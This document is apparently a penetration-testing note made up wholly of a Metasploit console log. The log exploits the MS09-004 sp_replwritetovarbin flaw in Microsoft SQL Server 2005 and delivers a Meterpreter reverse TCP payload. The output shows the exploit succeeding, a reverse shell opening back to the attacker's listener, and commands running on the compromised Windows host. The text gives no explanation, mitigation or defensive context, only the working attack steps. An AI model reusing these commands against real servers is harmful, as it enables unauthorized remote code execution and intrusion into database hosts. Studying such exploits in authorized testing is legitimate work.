control – metasploit mssql ms09_004_sp_replwritetovarbin

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address
lhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address
rhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to IP-Address
[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100

meterpreter > shell
Process 3748 created.
Channel 1 created.
Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : IP-Address
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : IP-Address

C:\WINDOWS\system32>
